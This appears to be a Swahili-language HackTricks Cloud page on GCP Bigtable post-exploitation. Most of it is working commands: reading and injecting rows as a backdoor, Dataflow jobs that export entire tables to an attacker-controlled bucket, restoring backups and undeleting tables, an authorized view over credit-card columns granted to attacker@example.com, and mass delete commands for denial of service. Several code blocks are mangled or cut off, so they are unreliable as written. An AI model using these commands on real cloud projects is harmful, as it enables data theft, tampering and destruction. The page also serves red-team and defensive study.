GCP - Bigtable Post Exploitation
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Bigtable
Kwa taarifa zaidi kuhusu Bigtable angalia:
Tip
Sakinisha
cbtCLI mara moja kupitia Cloud SDK ili amri hapa chini zifanye kazi mahali:Sakinisha cbt CLI
gcloud components install cbt
Soma safu
Ruhusa: bigtable.tables.readRows
cbt inakuja pamoja na Cloud SDK na inaongea na admin/data APIs bila kuhitaji middleware. Elekeza kwenye project/instance iliyovamiwa na toleza safu moja kwa moja kutoka kwenye jedwali. Punguza skani ikiwa unahitaji tu kuangalia kwa muda mfupi.
Soma rekodi za Bigtable
```bash # Install cbt gcloud components update gcloud components install cbtRead entries with creds of gcloud
cbt -project=
</details>
### Andika safu
**Ruhusa:** `bigtable.tables.mutateRows`, (utahitaji `bigtable.tables.readRows` ili kuthibitisha mabadiliko).
Tumia chombo hicho hicho kufanya upsert seli yoyote. Hii ndiyo njia ya haraka zaidi ya kuweka backdoor kwenye configs, ku-drop web shells, au kupandikiza poisoned dataset rows.
<details>
<summary>Ingiza safu yenye madhara</summary>
```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin
# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337
cbt set inakubali raw bytes kupitia syntax ya @/path, hivyo unaweza kusukuma compiled payloads au serialized protobufs sawa jinsi huduma za downstream zinavyotarajia.
Hamisha mistari kwenye bucket yako
Ruhusa: dataflow.jobs.create, resourcemanager.projects.get, iam.serviceAccounts.actAs
Inawezekana ku-exfiltrate maudhui ya jedwali zima kwenda bucket inayodhibitiwa na mshambuliaji kwa kuendesha Dataflow job inayotiririsha mistari kwenye bucket ya GCS unayodhibiti.
Note
Kumbuka kuwa utahitaji ruhusa
iam.serviceAccounts.actAsjuu ya SA fulani yenye ruhusa za kutosha kufanya export (kwa chaguo-msingi, isipokuwa kama imetajwa vinginevyo, default compute SA itatumika).
Hamisha Bigtable kwenye bucket ya GCS
```bash gcloud dataflow jobs runExample
gcloud dataflow jobs run dump-bigtable3
–gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json
–project=gcp-labs-3uis1xlx
–region=us-central1
–parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/
–staging-location=gs://deleteme20u9843rhfioue/staging/
</details>
> [!NOTE]
> Badilisha template kuwa `Cloud_Bigtable_to_GCS_Parquet` au `Cloud_Bigtable_to_GCS_SequenceFile` ikiwa unataka matokeo ya Parquet/SequenceFile badala ya JSON. Ruhusa ni zile zile; mabadiliko ni kwenye njia ya template pekee.
### Ingiza mistari
**Ruhusa:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
Inawezekana kuingiza yaliyomo ya jedwali zima kutoka kwa bucket inayoendeshwa na mshambuliaji kwa kuanzisha kazi ya Dataflow inayotuma mistari ndani ya bucket ya GCS unayodhibiti. Kwa hili, mshambuliaji ataahitaji kwanza kuunda faili ya parquet yenye data itakayolingana na schema inayotarajiwa. Mshambuliaji anaweza kwanza kusafirisha data kwa muundo wa parquet akifuata mbinu ya awali na kutumia setting `Cloud_Bigtable_to_GCS_Parquet` kisha kuongeza rekodi mpya ndani ya faili ya parquet iliyopakuliwa.
> [!NOTE]
> Kumbuka kwamba utahitaji ruhusa `iam.serviceAccounts.actAs` juu ya SA fulani yenye ruhusa za kutosha za kutekeleza usafirishaji (kwa default, ikiwa haijatolewa tofauti, default compute SA itatumika).
<details>
<summary>Ingiza kutoka bucket ya GCS kwenda Bigtable</summary>
```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=<REGION> \
--gcs-location=gs://dataflow-templates-<REGION>/<VERSION>>/GCS_Parquet_to_Cloud_Bigtable \
--project=<PROJECT> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=us-central1 \
--gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
--project=gcp-labs-3uis1xlx \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
--staging-location=gs://deleteme20u9843rhfioue/staging/
Kurejesha chelezo
Ruhusa: bigtable.backups.restore, bigtable.tables.create.
Mshambuliaji mwenye ruhusa hizi anaweza kurejesha chelezo katika jedwali jipya chini ya udhibiti wake ili aweze kupata tena data nyeti ya zamani.
Rejesha chelezo la Bigtable
```bash gcloud bigtable backups list --instance=gcloud bigtable instances tables restore
–source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID>
–async
–destination=<TABLE_ID_NEW>
–destination-instance=<INSTANCE_ID_DESTINATION>
–project=<PROJECT_ID_DESTINATION>
</details>
### Kurudisha meza zilizofutwa
**Permissions:** `bigtable.tables.undelete`
Bigtable inasaidia soft-deletion na kipindi cha huruma (kwa kawaida siku 7 kwa chaguo-msingi). Katika dirisha hili, mshambuliaji mwenye ruhusa `bigtable.tables.undelete` anaweza kurejesha jedwali lililofutwa hivi karibuni na kupata tena data zote zake, na hivyo kuwa na uwezo wa kufikia taarifa nyeti zilizodhaniwa kuwa zimeharibiwa.
Hii ni muhimu hasa kwa:
- Kupata tena data kutoka kwa jedwali zilizofutwa na walinzi wakati wa incident response
- Kupata data za kihistoria zilizofutwa kwa makusudi
- Kurudisha ufutaji wa bahati nasibu au wa uadui ili kudumisha persistence
<details>
<summary>Rudisha jedwali la Bigtable</summary>
```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
--show-deleted
# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
--instance=<instance-id>
Note
Operesheni ya undelete inafanya kazi tu ndani ya kipindi cha uhifadhi kilichowekwa (chaguo-msingi siku 7). Baada ya dirisha hili kuisha, jedwali na data zake zinafutwa kabisa na haiwezi kurejeshwa kupitia njia hii.
Create Authorized Views
Ruhusa: bigtable.authorizedViews.create, bigtable.tables.readRows, bigtable.tables.mutateRows
Authorized views hukuruhusu kuwasilisha subset iliyochaguliwa ya jedwali. Badala ya kuzingatia least privilege, zitumie kuchapisha exactly the sensitive column/row sets unazojali na whitelist principal yako.
Warning
Tatizo ni kwamba ili kuunda authorized view pia unahitaji kuwa na uwezo wa kusoma na mutate rows kwenye base table, kwa hivyo haupati ruhusa yoyote ya ziada, kwa hivyo mbinu hii kwa ujumla haina tija.
Create authorized view
```bash cat <<'EOF' > /tmp/credit-cards.json { "subsetView": { "rowPrefixes": ["acct#"], "familySubsets": { "pii": { "qualifiers": ["cc_number", "cc_cvv"] } } } } EOFgcloud bigtable authorized-views create card-dump
–instance=
–definition-file=/tmp/credit-cards.json
gcloud bigtable authorized-views add-iam-policy-binding card-dump
–instance=
–member=‘user:attacker@example.com’ –role=‘roles/bigtable.reader’
</details>
Kwa sababu ufikiaji umegawanywa kwa view, watetezi mara nyingi hawagundui kwamba umeunda endpoint mpya yenye unyeti mkubwa.
### Soma Authorized Views
**Ruhusa:** `bigtable.authorizedViews.readRows`
Iwapo una ufikiaji wa Authorized View, unaweza kusoma data kutoka kwake kwa kutumia Bigtable client libraries kwa kubainisha jina la authorized view katika maombi yako ya kusoma. Kumbuka kuwa authorized view huenda itapunguza kile unachoweza kufikia kutoka kwenye table. Hapo chini kuna mfano ukitumia Python:
<details>
<summary>Soma kutoka kwa authorized view (Python)</summary>
```python
from google.cloud import bigtable
from google.cloud.bigtable_v2 import BigtableClient as DataClient
from google.cloud.bigtable_v2 import ReadRowsRequest
# Set your project, instance, table, view id
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"
client = bigtable.Client(project=PROJECT_ID, admin=True)
instance = client.instance(INSTANCE_ID)
table = instance.table(TABLE_ID)
data_client = DataClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"
request = ReadRowsRequest(
authorized_view_name=authorized_view_name
)
rows = data_client.read_rows(request=request)
for response in rows:
for chunk in response.chunks:
if chunk.row_key:
row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
print(f"Row: {row_key}")
if chunk.family_name:
family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
print(f" {family}:{qualifier} = {value}")
Denial of Service via Delete Operations
Ruhusa: bigtable.appProfiles.delete, bigtable.authorizedViews.delete, bigtable.authorizedViews.deleteTagBinding, bigtable.backups.delete, bigtable.clusters.delete, bigtable.instances.delete, bigtable.tables.delete
Ruhusa zozote za kufuta za Bigtable zinaweza kutumika kama silaha kwa denial of service attacks. Mshambuliaji mwenye ruhusa hizi anaweza kuharibu operesheni kwa kufuta rasilimali muhimu za Bigtable:
bigtable.appProfiles.delete: Kufuta application profiles, kuvunja miunganisho ya client na usanidi wa routingbigtable.authorizedViews.delete: Kuondoa authorized views, kukata njia halali za upatikanaji kwa programubigtable.authorizedViews.deleteTagBinding: Kuondoa tag bindings kutoka authorized viewsbigtable.backups.delete: Kuangamiza backup snapshots, kuondoa chaguzi za disaster recoverybigtable.clusters.delete: Kufuta clusters nzima, kusababisha kutopatikana kwa data mara mojabigtable.instances.delete: Kuondoa instances kamili za Bigtable, kufuta meza zote na usanidibigtable.tables.delete: Kufuta meza mmoja mmoja, kusababisha upotevu wa data na kushindwa kwa programu
Futa rasilimali za Bigtable
```bash # Delete a table gcloud bigtable instances tables deleteDelete an authorized view
gcloud bigtable authorized-views delete
–instance=
Delete a backup
gcloud bigtable backups delete
–instance=
Delete an app profile
gcloud bigtable app-profiles delete
–instance=
Delete a cluster
gcloud bigtable clusters delete
–instance=
Delete an entire instance
gcloud bigtable instances delete
</details>
> [!WARNING]
> Operesheni za kufuta mara nyingi hufanyika mara moja na hazirekurudiki. Hakikisha kuna nakala za kuhifadhi kabla ya kujaribu amri hizi, kwani zinaweza kusababisha kupoteza data kwa kudumu na kuathiri vibaya huduma kwa kiasi kikubwa.
> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>
HackTricks Cloud

